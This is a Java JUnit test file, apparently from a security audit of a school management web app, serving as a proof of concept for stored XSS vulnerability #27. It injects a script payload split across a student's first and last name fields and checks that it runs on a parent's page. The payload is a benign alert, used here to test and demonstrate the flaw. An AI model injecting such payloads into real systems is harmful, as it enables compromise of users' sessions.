package tests.suite;

import com.gargoylesoftware.htmlunit.ScriptException;
import net.sourceforge.jwebunit.junit.WebTester;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import tests.utilities.Helper;

import java.io.IOException;

import static org.junit.Assert.assertTrue;

/**
 * Proof of concept for the XSS vulnerability #27.
 * This is a stored XSS vulnerability, exploiting the absence of
 * any sanitisation on the insert of a new student.
 * <p>
 * <h1>$studentid[1] $studentid[2]'s Classes</h1>
 * <p>
 * Very similar to #24.
 *
 * @author Davide Pedranz
 */
public final class Vulnerability27 {

    private WebTester tester;
    private Helper helper;

    @Before
    public void prepare() {
        tester = new WebTester();
        tester.setBaseUrl(Helper.BASE_URL);
        helper = new Helper(tester);
    }

    @Test
    public void test() {

        // login
        helper.loginAsAdmin();

        // edit the student (vulnerable form)
        tester.clickLinkWithText("Students");
        tester.assertMatch("Manage Students");
        tester.setWorkingForm("students");
        tester.checkCheckbox("delete[]");
        tester.clickButtonWithText("Edit");
        tester.setWorkingForm("editstudent");
        tester.setTextField("fname", "<script>alert(\""); // xss string
        tester.setTextField("lname", "x\");</script>q");  // xss string [cont]
        try {
            tester.clickButtonWithText("Edit Student");
        } catch (RuntimeException e) {
            // workaround: the attack creates invalid HTML on this page
            assertTrue(e.getCause() instanceof ScriptException);
            assertTrue(e.getMessage().contains("unterminated string literal"));
        }

        // now login as parent...
        // ... as a side effect, the script is present also here... just ignore it for now
        // since the vulnerability is reported for the next page
        try {
            tester.setExpectedJavaScriptAlert(" x");
            helper.loginAsParent();
        } catch (RuntimeException e) {
            // ignore this
            assertTrue(e.getCause() instanceof ScriptException);
            assertTrue(e.getMessage().contains("Exception invoking alert"));
        }
        tester.assertMatch("Students of parent parent");

        // NB: here we have one space more, but still the code was executed
        tester.clickElementByXPath("html//a[@class='items']");
        tester.assertNoMatch("<script>alert(\" x\")</script>");
    }

    @After
    public void cleanup() throws IOException {
        helper.cleanupStudentTestUser();
    }
}
